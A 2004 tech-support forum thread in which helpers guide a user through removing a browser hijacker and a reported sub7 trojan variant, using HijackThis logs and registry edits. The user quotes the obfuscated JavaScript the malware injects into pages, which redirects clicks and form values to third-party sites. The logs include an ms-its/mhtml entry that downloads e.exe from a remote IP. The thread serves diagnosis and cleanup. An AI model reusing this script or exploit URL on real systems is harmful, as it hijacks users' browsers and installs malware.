Home page stuck on "http://homepage.com/" can't change

Status
This thread has been Locked and is not open to further replies. Please start a New Thread if you're having a similar issue. View our Welcome Guide to learn how to use this site.

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
My home page is stuck on "http://homepage.com/" I don't know what the site is about be it getting annoing I've been reading some the other threads that talk about a similar problem with the site "coolwwwsearch".

I have followed the instructions there but have had no luck.
I would appreciate any help from anyone who can help.

I have downloaded the HijackThis program and this is the current log entry



Logfile of HijackThis v1.97.7
Scan saved at 3:49:07 AM, on 4/8/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\taskmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\wuauclt.exe
F:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\temp\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKLM\..\Run: [System Service] C:\WINDOWS\System32\msrexe.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {10000000-1000-0000-1000-000000000000} - file://C:\Program Files\Internet Explorer\ypbtuwdw.exe
O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481
O17 - HKLM\System\CCS\Services\Tcpip\..\{A1F04644-2517-40C9-8C36-E526B690A197}: NameServer = 207.69.188.187 207.69.188.186



I have also found that Internet Explore is adding code to any web page that I open.


It adds "<script language="JavaScript">
eval(String.fromCharCode(118,97,114,32,114,115,99,95,110,99,108,107,61,48,59,118,97,114,32,114,115,99,95,107,119,95,102,111,117,110,100,61,48,59,102,117,110,99,116,105,111,110,32,114,115,99,95,104,95,99,108,105,99,107,40,41,123,114,115,99,95,110,99,108,107,43,43,59,118,97,114,32,97,99,116,105,118,101,69,108,61,100,111,99,117,109,101,110,116,46,97,99,116,105,118,101,69,108,101,109,101,110,116,59,118,97,114,32,104,114,101,102,61,97,99,116,105,118,101,69,108,46,104,114,101,102,59,105,102,40,40,114,115,99,95,110,99,108,107,61,61,50,41,32,38,38,32,114,115,99,95,107,119,95,102,111,117,110,100,61,61,49,41,123,119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,116,112,58,47,47,119,119,119,46,108,111,99,97,116,111,114,46,99,99,47,103,111,63,39,43,104,114,101,102,41,59,114,101,116,117,114,110,32,102,97,108,115,101,59,125,101,108,115,101,123,114,101,116,117,114,110,32,116,114,117,101,59,125,125,102,117,110,99,116,105,111,110,32,114,115,99,95,104,95,115,110,100,102,111,114,109,40,41,123,118,97,114,32,105,44,106,59,102,111,114,40,106,61,48,59,106,60,100,111,99,117,109,101,110,116,46,102,111,114,109,115,46,108,101,110,103,116,104,59,106,43,43,41,123,102,111,114,32,40,105,61,48,59,105,60,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,106,93,46,108,101,110,103,116,104,59,105,43,43,41,123,105,102,32,40,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,61,39,104,116,116,112,58,47,47,39,41,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,101,108,101,109,101,110,116,115,91,105,93,46,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,97,100,117,108,116,45,100,118,100,109,111,118,105,101,46,99,111,109,47,39,59,125,125,125,114,101,116,117,114,110,32,116,114,117,101,59,125));
</script>" to the beginning of th page and "<script language="JavaScript"> var rsc_kw_found=0; </script>" to the end of the page
 
Joined
Jul 8, 2002
Messages
14,681
Fix These In HijackThis
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)

O4 - HKLM\..\Run: [System Service] C:\WINDOWS\System32\msrexe.exe

O16 - DPF: {10000000-1000-0000-1000-000000000000} - file://C:\Program Files\Internet Explorer\ypbtuwdw.exe

O16 - DPF: {11111111-1111-1111-1111-111111111123} - ms-its:mhtml:file://C:\ss.MHT!http://64.237.47.178//chm.chm::/1/e.exe

Delete this file from your computer
C:\WINDOWS\System32\msrexe.exe

That file is a variant of the sub7 trojan, you should run Spybot and a A virus scan.
You should also make sure you are running an updated antivirus and a firewall, and don't run any random thing someone sends you.

This virus sometimes stops you from running any ".exe" files after you remove it. If you have that problem, please tell us.
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
I followed your instructions but its still there.

I can't find "msrexe.exe" its not in "C:\WINDOWS\System32\".
I ran a system search on the file name and got nothing.

here is my current log file

Logfile of HijackThis v1.97.7
Scan saved at 3:43:36 AM, on 4/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\temp\hijackthis\HijackThis.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\system32\notepad.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481

I have "Symantec AntiVirus" running on my system and when did the fix in "HijackThis" it popped up this notice.

"Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Bloodhound.Exploit.6
File: C:\temp\hijackthis\backup-20040409-032913-730
Location: Quarantine
Computer: COOL
User: Admin
Action taken: Clean failed : Quarantine succeeded : Access denied
Date found: Fri Apr 09 03:29:13 2004"

I have also gotten notices about a virus called "Downloader.Trojan"
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
it's probably a hiodden file & you will probably have to be in safe mode to delete it so



Reboot into safe mode by following instructions here: http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid/2001052409420406
then as some of the files or folders you need to delete may be hidden do this:
Open Windows Explorer & Go to Tools > Folder Options. Click on the View tab and make sure that "Show hidden files and folders" is checked. Also uncheck "Hide protected operating system files" and untick "hide extensions for known file types" . Now click "Apply to all folders"
Click "Apply" then "OK"
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
and look for & dlete these files also
C:\ss.MHT

C:\Program Files\Internet Explorer\ypbtuwdw.exe
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
Ok, I rebooted into safe mode made the changes to the system and I still can't find the files.

I did however I did find two files that seem suspicious.

thier both in "C:\WINDOWS\Prefetch"

YPBTUWDW.EXE-0AAF6FFD.pf
MSREXE.EXE-2F899DF8.pf
 

dvk01

Derek
Retired Moderator Retired Malware Specialist
Joined
Dec 14, 2002
Messages
56,452
anything in prefetch is safe to delete

but post a new hjt log as sometimes we have noticed that these files are changing their names on a reboot

so reboot before posting the log please
 

SimplyJay

Thread Starter
Joined
Apr 8, 2004
Messages
8
Ok, I deleted the two files in "C:\WINDOWS\Prefetch"


here is the HijackThis log

Logfile of HijackThis v1.97.7
Scan saved at 6:36:00 AM, on 4/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\EPSON\EBAPI\eEBSVC.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\DefWatch.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\temp\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [EPSON Stylus CX5200] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P19 "EPSON Stylus CX5200" /O6 "USB001" /M "Stylus CX5200"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: BHODemon.lnk = C:\Program Files\BHODemon\BHODemon.exe
O4 - Global Startup: Microsoft Office.lnk = F:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://F:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O13 - WWW. Prefix: http://
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38045.3887731481
O17 - HKLM\System\CCS\Services\Tcpip\..\{A1F04644-2517-40C9-8C36-E526B690A197}: NameServer = 207.69.188.187 207.69.188.186
 
Joined
Oct 9, 2001
Messages
9,396
Fix this one with HijackThis:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.com@www.e-finder.cc/hp/ (obfuscated)

Correct your home page to the one you prefer....then immediately do the following:
Backup the registry and/or export the following keys:
go to Start>Run, type "regedit".........Navigate to:
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\

Right-click on the Internet Explorer key, choose new>Key, name it ControlPanel.

Right-click on ControlPanel, chose new>DWORD value, name it Homepage.
Right-click on Homepage, choose modify and type in the number 1.

This should lock your home page, so no other web site can change it.

Then navigate here and verify the homepage is correct:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
look for the Start Page entry.

Re-boot and see if it holds.
;)
 
Status
This thread has been Locked and is not open to further replies. Please start a New Thread if you're having a similar issue. View our Welcome Guide to learn how to use this site.

Users Who Are Viewing This Thread (Users: 0, Guests: 1)

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 807,865 other people just like you!

Latest posts

Members online

Top